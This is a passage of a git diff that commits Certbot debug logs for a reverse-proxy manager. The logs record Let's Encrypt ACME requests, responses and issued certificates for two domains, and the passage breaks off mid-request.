+Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I +tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ +YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty ++VUwFj9tmWxyR/M= +-----END CERTIFICATE----- + +2025-12-25 00:05:46,843:DEBUG:acme.client:Storing nonce: fULB7aUJqPXGzW7nm6lsQI3Jc4GNvLKmO1ncqi3gwCx5-kBvX4A +2025-12-25 00:05:46,843:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:05:46,847:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0567c4e1e52bc596eee80511ff65c7045231/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnFQWEd6VzdubTZsc1FJM0pjNEdOdkxLbU8xbmNxaTNnd0N4NS1rQnZYNEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU2N2M0ZTFlNTJiYzU5NmVlZTgwNTExZmY2NWM3MDQ1MjMxLzEifQ", + "signature": "EzTgcvIjtGmVlMD3j92b2YUXDkpzZoCC9mfkwqV_KnUbT2um6wxHnDyKcao-68VX_LtU6OztfWipBPzBjLT9jYH8kb8lQePCvBQVLjN1V9-UBoJr9tzEid87IyN8OA4h8fdOpyrV6laVi64t1RqVIdIFxHMj9l8TpcF0_KDRTbAkIA26OSRWMp-RQtGPYVw8t5nJBpWWDvZapnVdUYZu7GqBxumSKyc57FKXE5sQlyCM8MRcTqEY_MntBvFwZm_vYmm-K_CVWwiN-x_gdJ1EX8lOHF-6jfVHIChRI2uwQ6ZfFZG6cIVsSP5R9BDZfyBiM5JZ040XahrgxjkR-yzrcQ", + "payload": "" +} +2025-12-25 00:05:47,004:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0567c4e1e52bc596eee80511ff65c7045231/1 HTTP/1.1" 200 2340 +2025-12-25 00:05:47,005:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:46 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2340 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: fULB7aUJ9l9EZT39mTkRbN0Uc_EzHTT0pfJLQXmSxv-xjRLQYQ0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDrjCCAzSgAwIBAgISBWfE4eUrxZbu6AUR/2XHBFIxMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNTEyMjQyMzA3MTVaFw0yNjAzMjQyMzA3MTRaMBwxGjAYBgNVBAMTEXRh +cmdldHRzLmRkbnMubmV0MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEbppnNJdjc0qz +Zonc4aanqDlpEFG9XWU1L2OvCFZb9urxaNcrMLvEqXtBbAgTn0I1DlACppHvUm/0 +OK98nOUwEG4XbuerQJkb7VzQ8Gdkkqnon9YKwFsTQl2Ov/3cmu7lo4ICITCCAh0w +DgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAM +BgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRkdzIL9Mu+mUplt6f4Z/80MuokEzAfBgNV +HSMEGDAWgBSuSJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYI +KwYBBQUHMAKGFmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHAYDVR0RBBUwE4IRdGFy +Z2V0dHMuZGRucy5uZXQwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAi +oCCgHoYcaHR0cDovL2U3LmMubGVuY3Iub3JnLzUwLmNybDCCAQYGCisGAQQB1nkC +BAIEgfcEgfQA8gB3AEmcm2neHXzs/DbezYdkprhbrwqHgBnRVVL76esp3fjDAAAB +m1LTaKoAAAQDAEgwRgIhAI5q4PGH60OWaibalUHGm6EmlCqGgfOjn15nmKVQ37d4 +AiEAsS5aR/xBEfhiUbMCucTvsl3QLAOid+tI/z7tB5vq4pwAdwAOV5S8866pPjMb +LJkHs/eQ35vCPXEyJd0hqSWsYcVOIQAAAZtS02ifAAAEAwBIMEYCIQCsYfvhJlQv +vx3eVCerHw1Z6i39EZv0HSWmhZqhq1nTCQIhAPNsGeu51jzNdtuTSk0RIg6FePgZ +s6YURXF48dAU8/wOMAoGCCqGSM49BAMDA2gAMGUCMCYreQlbzELe4OdBK6u3Wgg9 +jLKm4gAVdQ9xgWMHPFPMYcUf5vekGpiYFvU6pKNcGAIxAKtMZqdaO0fB4NeyaMIx +YiTf4CNdcIom03b/PLO3EWx6/FMfLNlJBO4DJ0pjMIcWrQ== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL +MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo +IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN +MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j +cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ +vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF +HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw +DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS +BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA +gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm +MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww +CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu +b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX +lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb +Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf +-----END CERTIFICATE----- + +2025-12-25 00:05:47,006:DEBUG:acme.client:Storing nonce: fULB7aUJ9l9EZT39mTkRbN0Uc_EzHTT0pfJLQXmSxv-xjRLQYQ0 +2025-12-25 00:05:47,008:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2025-12-25 00:05:47,009:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-5. +2025-12-25 00:05:47,009:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-5. +2025-12-25 00:05:47,010:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-5/cert.pem. +2025-12-25 00:05:47,010:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-5/privkey.pem. +2025-12-25 00:05:47,011:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-5/chain.pem. +2025-12-25 00:05:47,011:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-5/fullchain.pem. +2025-12-25 00:05:47,012:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-5/README. +2025-12-25 00:05:47,041:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2025-12-25 00:05:47,041:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2025-12-25 00:05:47,041:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2025-12-25 00:05:47,041:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2025-12-25 00:05:47,042:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2025-12-25 00:05:47,042:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2025-12-25 00:05:47,042:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2025-12-25 00:05:47,042:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2025-12-25 00:05:47,042:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:05:47,043:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 00:05:47,043:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2025-12-25 00:05:47,043:DEBUG:certbot.configuration:Var webroot_map={'targetts.ddns.net': '/data/letsencrypt-acme-challenge'} (set by user). +2025-12-25 00:05:47,045:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-5/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-5/privkey.pem +This certificate expires on 2026-03-24. +These files will be updated when the certificate renews. +2025-12-25 00:05:47,045:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2025-12-25 00:05:47,045:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2025-12-25 00:05:47,047:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.15 b/proxy-manager/data/logs/letsencrypt.log.15 new file mode 100755 index 0000000..c0ad055 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.15 @@ -0,0 +1,1512 @@ +2025-12-24 22:15:02,881:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-24 22:15:02,881:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-24 22:15:02,881:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-4', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'dev.profibot.hu'] +2025-12-24 22:15:02,881:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-24 22:15:02,891:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-24 22:15:02,891:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-24 22:15:02,891:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-24 22:15:02,892:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-24 22:15:02,892:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-24 22:15:02,929:DEBUG:certbot._internal.main:Picked account: +2025-12-24 22:15:02,929:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-24 22:15:02,930:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-24 22:15:03,400:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-24 22:15:03,401:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:03 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "SSPYI0mM2AM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-24 22:15:03,402:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for dev.profibot.hu +2025-12-24 22:15:03,405:DEBUG:acme.client:Requesting fresh nonce +2025-12-24 22:15:03,405:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-24 22:15:03,558:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-24 22:15:03,559:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:03 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEfPk0EQkmqyyQRLVEIwmaz3IVJZjN1BOWH31lEoUE80A +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-24 22:15:03,559:DEBUG:acme.client:Storing nonce: 58tS3qjEfPk0EQkmqyyQRLVEIwmaz3IVJZjN1BOWH31lEoUE80A +2025-12-24 22:15:03,560:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "dev.profibot.hu"\n }\n ]\n}' +2025-12-24 22:15:03,566:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWZQazBFUWttcXl5UVJMVkVJd21hejNJVkpaak4xQk9XSDMxbEVvVUU4MEEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "Ta6TUGo09g6Xu2MKzWQ60mIDNKuJwsXb-1Bowmcnl6niiKScqUDc_ikq6D_njM0q7BdXqV3OUkSwpRGCrKCtkZPl1OV2_5du3rk6rw0zd3p58_ji50EuRvF_3mIS8Q1KRD8kxIsKPoZkfcYJS8IkI9lH0pnBnBWJcWxvVhFqWfW4WZ5LUruIq_COuV4WDLihGlr3cVVUB7yNiDK6roP6Lwlf7yqfEZw6tYVXaU5CGBFdy1kHQAwmvhKV2RZ52EJMQvxE1wAW-4126BS--eomxyKCgBYFBKJJuNLxb8_aIq8yio5kLRa0zJvrfWfGsc6zpwxUr4z5L5I_GiRjkiQiWg", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImRldi5wcm9maWJvdC5odSIKICAgIH0KICBdCn0" +} +2025-12-24 22:15:03,746:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 349 +2025-12-24 22:15:03,747:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:03 GMT +Content-Type: application/json +Content-Length: 349 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462336946666 +Replay-Nonce: 58tS3qjEoXzQw7iLepLemgoWn1R4ARWmjZ83tOmXNy-wVFUbjig +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "identifiers": [ + { + "type": "dns", + "value": "dev.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462336946666" +} +2025-12-24 22:15:03,747:DEBUG:acme.client:Storing nonce: 58tS3qjEoXzQw7iLepLemgoWn1R4ARWmjZ83tOmXNy-wVFUbjig +2025-12-24 22:15:03,748:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:03,751:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRW9YelF3N2lMZXBMZW1nb1duMVI0QVJXbWpaODN0T21YTnktd1ZGVWJqaWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "Z1v-LwSzyFzGDsL91I4ccOW2FMg2_PAWEFTrbnhwIXZo1OwvuzuE4C_np7qadakocaIiVZxBDAEiy66wZRh7YYyK-OOKgIf-b9VxbxozlcEnDvfZIc0hLZ5Vkg7QVNWh3ZXqGv5G5nbpOIPoMAhYSIEX-6ZrBbOlzf_HGQMUwrFJTEE44siNdwy98yV_vjyOeqpRl8OgTZ9QH6fdkEDoyEgz1DawHr1FCmjXCLsgT_4hpZCiEjuFYt2fUGdMLleyFksDrf7rkfrvh4AYJQIxWUO3cgeIJ9dqYwc30dXCC6NPXxb959Hb6mhyYv8rj3xOWwOW9uPzu1gAdsr1Eui9dQ", + "payload": "" +} +2025-12-24 22:15:03,909:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:03,910:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:03 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEKCm1zEPoYEG77OdTv01kKsTgeYdGWQD9enho-2-o21A +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:03,910:DEBUG:acme.client:Storing nonce: 58tS3qjEKCm1zEPoYEG77OdTv01kKsTgeYdGWQD9enho-2-o21A +2025-12-24 22:15:03,910:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:03,911:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-24 22:15:03,912:INFO:certbot._internal.auth_handler:http-01 challenge for dev.profibot.hu +2025-12-24 22:15:03,912:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-24 22:15:03,913:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-24 22:15:03,913:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY +2025-12-24 22:15:03,914:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-24 22:15:03,915:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUtDbTF6RVBvWUVHNzdPZFR2MDFrS3NUZ2VZZEdXUUQ5ZW5oby0yLW8yMUEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2L0ZER3o3ZyJ9", + "signature": "NMYogEwPiXw94KjNSYdSVYcREXcRbteemMN0i6a3UYT2DoMwiRaiMJYtUwEpg0baSQ3mFwatEyNnNeHqVp5PFk6BwSvRUpCsUhk3AzXVDiL6thBKHcHR5_VHdhS5jdyvdiw6_rMSCG5l_oWTnxCgvXqkUgWeiAfjw7hZBDQtewubEP92vTDpGYgGgkRg_fiAR7jEhDzCk1QiWYqLMkCykSGgc7TF_IfCAFNo24aB_Sqv7He_vrWAxTDTSGkNFMkmCL2_BT3HzIbZm1afBn9XxRbLn2iKBwkqkuPqI0xgt1hFUFYChu_Uk8FtGpR-eFzgglJiAVdgFrI8HviqTWdHTA", + "payload": "e30" +} +2025-12-24 22:15:04,073:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632535074556/FDGz7g HTTP/1.1" 200 195 +2025-12-24 22:15:04,074:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:03 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g +Replay-Nonce: fULB7aUJzkBla4qGMjUc_zfmVlbqFCEMxQVon_i91_wW-7wb2Zw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" +} +2025-12-24 22:15:04,075:DEBUG:acme.client:Storing nonce: fULB7aUJzkBla4qGMjUc_zfmVlbqFCEMxQVon_i91_wW-7wb2Zw +2025-12-24 22:15:04,075:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-24 22:15:05,076:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:05,080:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnprQmxhNHFHTWpVY196Zm1WbGJxRkNFTXhRVm9uX2k5MV93Vy03d2IyWnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "EjzULhNW_qaAoYlKXu-KPlzm4HCyPE4SEV9THDudsxePxbSKStkyeP6mqe6cJrrFtjI2FHoMwSRpDJl_f1g2VGpsE9PMl9vYf5y30E-XdtFsA6y0fi1riuauKT7BmsL-F_ngbwgUCsMmF4F4PmAIsEHAR8zL9ziOCBo7f6Bv0e9iPhhtnqNfh8qg_vHLx8z3cgcNkL634Ohin3Wah9ljZNqd6XEaB6StFWtEgA3UQFWOCqD3foF45i0AK9E7RsLfWCcjjVFoRjs5hW1DSH2nZoEynnFCRVlw0de2parHj1QARdGMvrEYq7qZncPWdtbilz32P-hQ4ZUt6Y33RWzumQ", + "payload": "" +} +2025-12-24 22:15:05,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:15:05,237:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:15:05 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjECTgbEUfoaR851HRfXSKQNZYHQ6iqTNfHa2mAio0T-n4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:15:05,238:DEBUG:acme.client:Storing nonce: 58tS3qjECTgbEUfoaR851HRfXSKQNZYHQ6iqTNfHa2mAio0T-n4 +2025-12-24 22:15:05,238:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:15:08,239:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:15:08,243:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUNUZ2JFVWZvYVI4NTFIUmZYU0tRTlpZSFE2aXFUTmZIYTJtQWlvMFQtbjQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": 